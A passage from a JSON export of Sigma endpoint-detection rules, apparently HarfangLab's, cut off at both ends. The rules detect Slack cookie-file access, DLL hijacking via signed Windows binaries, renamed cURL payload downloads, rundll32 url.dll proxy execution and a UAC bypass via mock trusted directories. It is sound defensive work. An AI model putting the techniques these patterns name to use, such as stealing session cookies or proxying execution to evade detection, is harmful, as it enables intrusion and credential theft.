exclusion_phpstorm:\n Image: '/users/*/applications/phpstorm.app/contents/macos/phpstorm'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 
'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.macpaw.CleanMyMac*'\n - 'com.macpaw.cmm-business'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "72bb29dc-a52f-43a7-ab84-f003a519cd50",
"rule_name": "Suspicious Access to Slack Sensitive Files",
"rule_description": "Detects suspicious access to Slack files that hold cookies or other sensitive data.\nAdversaries may steal Slack application cookies and use them to gain access to the application without needing credentials.\nIt is recommended to verify whether the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7306d88f-f220-4e1d-9f13-19a06e2466e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587199Z",
"creation_date": "2026-03-23T11:45:34.587203Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587211Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tttracer.yml",
"content": "title: DLL Hijacking via tttracer.exe\nid: 7306d88f-f220-4e1d-9f13-19a06e2466e0\ndescription: |\n Detects potential Windows DLL Hijacking via tttracer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tttracer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\TTDRecord.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7306d88f-f220-4e1d-9f13-19a06e2466e0",
"rule_name": "DLL Hijacking via tttracer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tttracer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "730f4da7-7e20-4f68-99bc-9f28d4c60594",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592313Z",
"creation_date": "2026-03-23T11:45:34.592316Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592324Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgedevtools.yml",
"content": "title: DLL Hijacking via microsoftedgedevtools.exe\nid: 730f4da7-7e20-4f68-99bc-9f28d4c60594\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgedevtools.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgedevtools.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\iertutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "730f4da7-7e20-4f68-99bc-9f28d4c60594",
"rule_name": "DLL Hijacking via microsoftedgedevtools.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoftedgedevtools.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "732a4632-5577-440f-8774-b143fe7bd868",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602410Z",
"creation_date": "2026-03-23T11:45:34.602414Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602421Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpclip.yml",
"content": "title: DLL Hijacking via rdpclip.exe\nid: 732a4632-5577-440f-8774-b143fe7bd868\ndescription: |\n Detects potential Windows DLL Hijacking via rdpclip.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpclip.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\DEVOBJ.dll'\n - '\\dwmapi.dll'\n - '\\IPHLPAPI.DLL'\n - '\\mpr.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\PROPSYS.dll'\n - '\\srpapi.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\WINSTA.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 
Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "732a4632-5577-440f-8774-b143fe7bd868",
"rule_name": "DLL Hijacking via rdpclip.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpclip.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7331ca01-b007-4859-8a9e-954ca5d68719",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619303Z",
"creation_date": "2026-03-23T11:45:34.619305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619309Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/003/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_suspicious_execution_renamed_curl.yml",
"content": "title: Suspicious Execution of Renamed cURL\nid: 7331ca01-b007-4859-8a9e-954ca5d68719\ndescription: |\n Detects the suspicious usage of a renamed cURL Windows binary.\n Attackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\n They may also try to rename or move the binary to evade security solutions.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\nreferences:\n - https://attack.mitre.org/techniques/T1036/003/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/12/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1036.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Curl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'curl.exe'\n\n filter_correct_name:\n Image|endswith:\n - '\\curl.exe'\n - '\\curl_x64.exe'\n - '\\curl_x86.exe'\n - '\\domotz_curl.exe'\n - '?:\\Program Files\\Windows Remote Agent\\URLDownloader.exe'\n - '?:\\Program Files (x86)\\Windows Remote Agent\\URLDownloader.exe'\n - '?:\\Program Files\\Talend *\\logserv\\utils\\curl-*.exe'\n - '?:\\ProgramFiles\\Talend*\\logserv\\utils\\curl-*.exe'\n\n exclusion_talend:\n ProcessGrandparentImage: '?:\\Program Files\\Talend *\\utils\\nssm.exe'\n Image: '?:\\Program Files\\Talend *\\logserv\\utils\\curl-*-windows-x86.exe'\n\n exclusion_lamexp:\n ProcessParentOriginalFileName: 'LameXP.exe'\n Image|endswith: '\\lxp_curl.exe'\n\n exclusion_checkpoint:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\curl_cli.exe'\n ProcessCommandLine|contains: 
'unregConf.txt -o NUL -k --retry 5'\n ProcessParentImage:\n - '?:\\Windows\\system32\\msiexec.exe'\n - '?:\\Windows\\Syswow64\\msiexec.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7331ca01-b007-4859-8a9e-954ca5d68719",
"rule_name": "Suspicious Execution of Renamed cURL",
"rule_description": "Detects the suspicious usage of a renamed cURL Windows binary.\nAttackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\nThey may also try to rename or move the binary to evade security solutions.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\n",
"rule_creation_date": "2023-12-19",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.003",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73475251-0849-445c-bece-3e32ae43749d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598021Z",
"creation_date": "2026-03-23T11:45:34.598026Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598039Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Url/",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_url_proxy_execution.yml",
"content": "title: Proxy Execution via url.dll\nid: 73475251-0849-445c-bece-3e32ae43749d\ndescription: |\n Detects a suspicious invocation of url.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling url.dll's FileProtocolHandler or OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Url/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Url\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_url:\n ParentCommandLine|contains:\n - ' url,'\n - ' url.dll,'\n\n selection_functions:\n ParentCommandLine|contains:\n - 'OpenURL'\n - 'FileProtocolHandler'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '\\Device\\HarddiskVolume*\\\\*\\Program Files\\'\n - '\\Device\\HarddiskVolume*\\\\*\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_waterfox:\n Image|endswith: '\\waterfox.exe'\n 
ProcessSigned: 'true'\n ProcessSignature: 'BROWSERWORKS LTD'\n\n exclusion_comet:\n Image|endswith: '\\comet.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PERPLEXITY AI, INC.'\n\n exclusion_chrome:\n Image|endswith: '\\chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_misc_browser:\n - Image|endswith: '\\brave.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Brave Software, Inc.'\n - Image|endswith: '\\Application\\vivaldi.exe'\n - Image|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Opera Norway AS'\n - 'Opera Software AS'\n - Image|endswith: '\\Chromium\\thorium.exe'\n - Image|endswith: '\\SmartBrowser-Blink.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'OODRIVE S.A.S.'\n - Image|endswith:\n - '\\chromium\\chromium.exe'\n - '\\Chromium\\Application\\chrome.exe'\n - '\\GoogleChromePortable\\App\\Chrome-bin\\chrome.exe'\n - Image|endswith:\n - '\\jxbrowser\\chromium.exe'\n - '\\jxbrowser64\\chromium.exe'\n - ProcessOriginalFileName: 'zen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, OSCAR GONZALEZ MORENO'\n - Image|endswith: '\\MicrosoftEdgeCP.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n\n exclusion_vscode:\n Image|endswith: '\\Code.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_msh:\n ParentCommandLine|endswith: '.msh'\n Image|endswith: '\\gmsh.exe'\n\n exclusion_openwith:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\OpenWith.exe'\n - '?:\\Windows\\System32\\OpenWith.exe'\n\n exclusion_typora:\n ProcessSigned: 'true'\n ProcessSignature: 'Qiyun (Shanghai) Tech Ltd.'\n ProcessImage|endswith: '\\Typora.exe'\n\n exclusion_notepad:\n ProcessImage:\n - '?:\\Windows\\System32\\notepad.exe'\n - 
'?:\\Windows\\Syswow64\\notepad.exe'\n\n exclusion_paint:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\syswow64\\mspaint.exe'\n\n exclusion_kingsoft:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Kingsoft\\WPS Office\\\\*\\office6\\wps.exe'\n\n exclusion_atlantisupdater:\n ParentCommandLine:\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createIconAssociation*AtlantisUpdater.reg'\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createIconAssociation*AtlantisUpdater.bat'\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createFileAssociation*AtlantisUpdater.bat'\n - 'rundll32 url.dll,FileProtocolHandler ?:\\Users\\\\*\\AppData\\Local\\Temp\\createFileAssociation*AtlantisUpdater.reg'\n\n exclusion_protocols:\n ParentCommandLine|contains:\n - 'FileProtocolHandler field6://'\n - 'FileProtocolHandler v3d3s://'\n\n exclusion_camunda:\n Image: '?:\\Users\\\\*\\AppData\\Roaming\\Camunda Modeler\\Camunda Modeler.exe'\n\n exclusion_sumatra_pdf:\n Image: '?:\\Users\\\\*\\AppData\\Local\\SumatraPDF\\SumatraPDF.exe'\n\n exclusion_foxit_reader:\n Signed: 'true'\n Signature: 'FOXIT SOFTWARE INC.'\n\n exclusion_excel:\n Image: '?:\\Microsoft Office\\Office16\\EXCEL.EXE'\n\n exclusion_docker:\n ProcessParentCommandLine|contains: 'FileProtocolHandler https://login.docker.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73475251-0849-445c-bece-3e32ae43749d",
"rule_name": "Proxy Execution via url.dll",
"rule_description": "Detects a suspicious invocation of url.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling url.dll's FileProtocolHandler or OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
"rule_creation_date": "2025-10-17",
"rule_modified_date": "2025-11-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7349845f-0229-4bb2-ab6b-a39f0dca1dc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618115Z",
"creation_date": "2026-03-23T11:45:34.618117Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618121Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
"https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_mocking_trusted_directories.yml",
"content": "title: UAC Bypass Executed via Mocking Trusted Directories\nid: 7349845f-0229-4bb2-ab6b-a39f0dca1dc5\ndescription: |\n Detects the execution of a binary from a Mocking Trusted Directories wich is a sign of an attempt of UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n - https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/07/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith:\n - '?:\\Windows \\'\n - '?:\\ Windows\\'\n - '?:\\ Windows \\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7349845f-0229-4bb2-ab6b-a39f0dca1dc5",
"rule_name": "UAC Bypass Executed via Mocking Trusted Directories",
"rule_description": "Detects the execution of a binary from a Mocking Trusted Directories wich is a sign of an attempt of UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2021-07-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "734b213f-25e3-402d-862b-ccbe5a1166f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
